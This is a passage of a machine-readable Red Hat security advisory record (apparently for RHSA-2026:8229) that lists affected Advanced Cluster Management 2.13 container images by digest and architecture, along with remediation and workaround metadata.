"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
